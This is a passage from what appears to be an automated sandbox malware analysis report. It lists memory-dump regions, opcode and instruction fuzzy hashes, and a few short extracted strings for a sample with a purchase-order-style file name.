                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef72dc7fd78165fa3aa53ec2b84db11a3e1130112f292c822d184796e4dbacfc
                                                          • Instruction ID: e390cfd109fbf3d289e9cae5cb6381cfb74d789734e1bdda68094c96b149e51e
                                                          • Opcode Fuzzy Hash: ef72dc7fd78165fa3aa53ec2b84db11a3e1130112f292c822d184796e4dbacfc
                                                          • Instruction Fuzzy Hash: 52F04574906218CFEB54CF28ED69B9CBBB1FB08351F1002D6E509A3241DB745D80CF54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86fdf8b765124653c8bcef1681e1cbea18fd3d8405bdb74a4a8d4f2d5ad24dd9
                                                          • Instruction ID: a50b570437793f3d42ac6c0818a63075c856c9c7e01e7651cfe5a3acdda0b1ca
                                                          • Opcode Fuzzy Hash: 86fdf8b765124653c8bcef1681e1cbea18fd3d8405bdb74a4a8d4f2d5ad24dd9
                                                          • Instruction Fuzzy Hash: 90E04F30A10218CFDB18EFA4D8997ADBBB2EB88300F00C0DAD58973384CA342E44CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59a10618f52dde262993805cb3a6cd4fcc9361a990009969d436baf23e850f8b
                                                          • Instruction ID: 63f1354451c3df600616746a8894bf860e323c0bbc8c98b3a5dd25754c4c5b1b
                                                          • Opcode Fuzzy Hash: 59a10618f52dde262993805cb3a6cd4fcc9361a990009969d436baf23e850f8b
                                                          • Instruction Fuzzy Hash: 7BE0E531A01115CBD7A8DB24D8947ADBBB1EB89714F10C1A9E899A3284DE342DC99F41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81e5f1359ae3ec93eabc9ffdadd0cc9deaa3af2299cc8ba4da148a29290bb3a5
                                                          • Instruction ID: a12826698501a584c5a3d61e80f003210c89a116433250c809109051391dd5ba
                                                          • Opcode Fuzzy Hash: 81e5f1359ae3ec93eabc9ffdadd0cc9deaa3af2299cc8ba4da148a29290bb3a5
                                                          • Instruction Fuzzy Hash: BAE01A31A5021DCBEB28DF24E899BAD7B76EB84315F1080E9E40D63294DE346D80DF61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 845e9ce36c8b0b1db117efd077c1c65e74e8e3a590f8cd65c59df2d2a273c391
                                                          • Instruction ID: 51069843c1f301debba8bcc5ab47805eae68ef8771199e0192e8008b860c84f0
                                                          • Opcode Fuzzy Hash: 845e9ce36c8b0b1db117efd077c1c65e74e8e3a590f8cd65c59df2d2a273c391
                                                          • Instruction Fuzzy Hash: 5DE01A31A00158CBD728DF64D8997DDBB71EB89304F50C0DAE54A73284CA346E80CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b9c88a7fa51d9cf5462b3f90f6cda1535e8791d469e59fc2996befddcaa6392
                                                          • Instruction ID: 2dd6951c5f8bca77b9d161da4a60548d66adde25b81cdefecd15fb9b0bb4a98a
                                                          • Opcode Fuzzy Hash: 0b9c88a7fa51d9cf5462b3f90f6cda1535e8791d469e59fc2996befddcaa6392
                                                          • Instruction Fuzzy Hash: 8BE0E530A151188BD758DB24C8993ED7AB2EB89310F1080D9D48E63385CE742EC9CF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fa7524ad29b3453c7fb1b6f78fdeac250a74391868dbffacf96d3c46cb441fb
                                                          • Instruction ID: 829290f7d97b6dbbbaae819d98a7447eda4f8825fa8b7a8e0e48a80b2b48133e
                                                          • Opcode Fuzzy Hash: 2fa7524ad29b3453c7fb1b6f78fdeac250a74391868dbffacf96d3c46cb441fb
                                                          • Instruction Fuzzy Hash: B3E0ED71900658CBDB54DB24D898799BBB2EB84341F60C0D9A44967384CF342D84CF52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8f8c6e854188444690ee0af9879ce00cff580aa3072da9e58838dfdaad32d3b
                                                          • Instruction ID: d00c4cf4741941837bdead4f43b9a776ec4cd0bb41d1f2ea656e102d9eff3498
                                                          • Opcode Fuzzy Hash: b8f8c6e854188444690ee0af9879ce00cff580aa3072da9e58838dfdaad32d3b
                                                          • Instruction Fuzzy Hash: 32D01270A00208EBCB44EFADD94155DB7B5DB45200B1085A89409D3311DE311F00AB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d9a8e7116a7b146b549d91d1c8c2b72a795b4559a92b6f5c0d67cc1fa758c448
                                                          • Instruction ID: af6423d1bbcb856fb3eea85337dafa66e256de476c7f4f9138f413d777f7045c
                                                          • Opcode Fuzzy Hash: d9a8e7116a7b146b549d91d1c8c2b72a795b4559a92b6f5c0d67cc1fa758c448
                                                          • Instruction Fuzzy Hash: A5D01734E4411CDBEB24DBB4E4887DCBBB1FB84215F1000AAD109A3241CB740995CF10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04f335df0bcd55808cb6ab2b64e64fedc3f16636f4d7c50ea409527716fe44b6
                                                          • Instruction ID: a4a6351b94c3101e39300b0400ef32f1010481ccbada0bcb7e66627e532970c3
                                                          • Opcode Fuzzy Hash: 04f335df0bcd55808cb6ab2b64e64fedc3f16636f4d7c50ea409527716fe44b6
                                                          • Instruction Fuzzy Hash: 6BE0C270A04248CFE704DF68C8487DA7BB1EFC8300F04C098D04CA7304CB7049848F91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b2dd0199dc4da7930eb4d52a0375e6c9cf9a705eddf657525d2bd8c75a3c9e6
                                                          • Instruction ID: bc1bf4716f5069b8c391fb52efd420389f052a34eac1fd977eb25ad0a93fc180
                                                          • Opcode Fuzzy Hash: 6b2dd0199dc4da7930eb4d52a0375e6c9cf9a705eddf657525d2bd8c75a3c9e6
                                                          • Instruction Fuzzy Hash: 44D05EB0A0439C8FCB1CFF24D8887593BB2FB40340F109A99E40963344CB741D868F42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eeca8324badd8d190f6faf0a5c9c198357a0aab1b3854894b0bfe97566d245bc
                                                          • Instruction ID: cdfb696e26efde97b5483e97616bec827db6d1a9a7be43e0d12daafc077513ec
                                                          • Opcode Fuzzy Hash: eeca8324badd8d190f6faf0a5c9c198357a0aab1b3854894b0bfe97566d245bc
                                                          • Instruction Fuzzy Hash: 42C02B3104F60883C6206799980C77573DCD70F321F005C02DE0D834230FF0B480CA94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3df2d421de393b91c2232d42043b25936b09338959b8de2872c31e2fe4b45bc6
                                                          • Instruction ID: 6134c361841a288001d359cf235652726c5af4ee2bb5ed578fd73cdde5c046cd
                                                          • Opcode Fuzzy Hash: 3df2d421de393b91c2232d42043b25936b09338959b8de2872c31e2fe4b45bc6
                                                          • Instruction Fuzzy Hash: FFD01236000104EFD700EFE4D844A597B34EF98330B068091E5245B371CB31CC12CE91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf2bdd8601c74f76081c2a28a9596e2a72d27e82dcfc6ef92c770297e9367187
                                                          • Instruction ID: 8115b84772b0fa70d8b12792fc77a300fbf736c577d687d0f11b16aa955618ac
                                                          • Opcode Fuzzy Hash: bf2bdd8601c74f76081c2a28a9596e2a72d27e82dcfc6ef92c770297e9367187
                                                          • Instruction Fuzzy Hash: 77C08C300416088BE30877EAED0D7BD3768EB0230AF4448A2E50C028109FF9AC40CAFA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 638fb872c2bf1732f001aa8616538d5222ea4d9ee1d781e4b671315f6b702c68
                                                          • Instruction ID: 5bbe13e36370dee7ce9a83e2ab66aa1a08572c29aa2bbf182d5bceaac9b9bc3a
                                                          • Opcode Fuzzy Hash: 638fb872c2bf1732f001aa8616538d5222ea4d9ee1d781e4b671315f6b702c68
                                                          • Instruction Fuzzy Hash: BAD0C735904111CBD7189F16CC145D977A47F5974175A8465C74593110D734E9419BE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$2$7$C
                                                          • API String ID: 0-2463851005
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$,bq
                                                          • API String ID: 0-1616511919
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "
                                                          • API String ID: 0-123907689
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 892a00b74aa70e7f21331ac9ed06affb379b22ff63bc7cd82e70e0ecad6004ec
                                                          • Instruction ID: 8343c0acbab56f505b2c934f6b855424495e700b15f14354b24974019814168b
                                                          • Opcode Fuzzy Hash: 892a00b74aa70e7f21331ac9ed06affb379b22ff63bc7cd82e70e0ecad6004ec
                                                          • Instruction Fuzzy Hash: 1E71C574E04218CFEB24DF65E944BEDBBF2BF49304F10A0A9D449A7251EB749985CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c92f81c9cd0da8087364071f3034dd8f11c109f7eec8e6138eb246ca5926a20
                                                          • Instruction ID: 38d8205b236a6467a7e76b2863d3bdde08c46c8457fa68bc8d6fcf5b0e676c25
                                                          • Opcode Fuzzy Hash: 3c92f81c9cd0da8087364071f3034dd8f11c109f7eec8e6138eb246ca5926a20
                                                          • Instruction Fuzzy Hash: 26515670D05208CFEB08CFA9D58A7EDBBF2FB89310F54906AE449A7294DB785945CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7838052bcfc341bfce8d0263ff6fb8d7538dcb1e9f57533aeabefab23d791e06
                                                          • Instruction ID: 1cd5d37e55edd9ca31de0ddc18ec44199d10525caa89caba179352ce0cbce563
                                                          • Opcode Fuzzy Hash: 7838052bcfc341bfce8d0263ff6fb8d7538dcb1e9f57533aeabefab23d791e06
                                                          • Instruction Fuzzy Hash: 63515570D06208CFDB08CFA9D68A7EDBBF2FB89310F50906AE449A7294D7785945CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 962587bf83b2f570f9b9293806ba931d1b6500e04b701ca3d894525058e22a94
                                                          • Instruction ID: 66ab0c08775238cf2d02e9395e42caf9ae4dd8536bf3a10365a22a73c2a4d25a
                                                          • Opcode Fuzzy Hash: 962587bf83b2f570f9b9293806ba931d1b6500e04b701ca3d894525058e22a94
                                                          • Instruction Fuzzy Hash: A051B670D45259CBEB28CFAAC8457EDBBF2BF88304F14C4AAC409A7255DB745985DF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c33b67a33242ad82f177aa8fcc2b274a1777b17276a34bd9c3aac15946c0665a
                                                          • Instruction ID: 7883cfd23dd75283f82b93ed90b7f5fe4f6ca871c752f3e064f584217f3bd1e4
                                                          • Opcode Fuzzy Hash: c33b67a33242ad82f177aa8fcc2b274a1777b17276a34bd9c3aac15946c0665a
                                                          • Instruction Fuzzy Hash: 234156B1E016189BEB08CFABC94069EFBF7BFC8310F14C06AD958AB214DB7459458F54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32f0063c257234c736f4e9c073ed98431adebea9b8bd382578ff63148588d640
                                                          • Instruction ID: 46b42c4c302cdb4593cb3f8dbae9fa71eccfcb1d5c6831378aa19f41cd7189f0
                                                          • Opcode Fuzzy Hash: 32f0063c257234c736f4e9c073ed98431adebea9b8bd382578ff63148588d640
                                                          • Instruction Fuzzy Hash: 0851C370E04258CFDB28CF6AD944BADBBF6BF89300F14C4AAD40AA7214DB745A85CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3771a94d84aae6bf99c26f55b5ca7d6729ce9fbcd67271772696d3c5b3de1de4
                                                          • Instruction ID: dfeebfa22972fde5c1181b0e0c2a27c8c0a3d3eab211d760c0a894969404a81d
                                                          • Opcode Fuzzy Hash: 3771a94d84aae6bf99c26f55b5ca7d6729ce9fbcd67271772696d3c5b3de1de4
                                                          • Instruction Fuzzy Hash: 9F51E670D05259CBEB28CFAAC8457EEBBF2AF88300F18C4AAC409A7255DB745985DF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de8a6493495ea935541b4278f5dda6908dcd2c6841c205e900af1a505c98ba62
                                                          • Instruction ID: 1d49555442fef14e44ed11cf230fed552d4d9695e1463d6ebc2f9a1464b6e2d9
                                                          • Opcode Fuzzy Hash: de8a6493495ea935541b4278f5dda6908dcd2c6841c205e900af1a505c98ba62
                                                          • Instruction Fuzzy Hash: E86168B0E142298FDBA4CF68C884B8EB7F5BF49314F5481A9D45DEB202D730AA85CF15
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6879f978427ae0a3a51fd710d502db6edfcc1637e09f2e89ebe1609139f69501
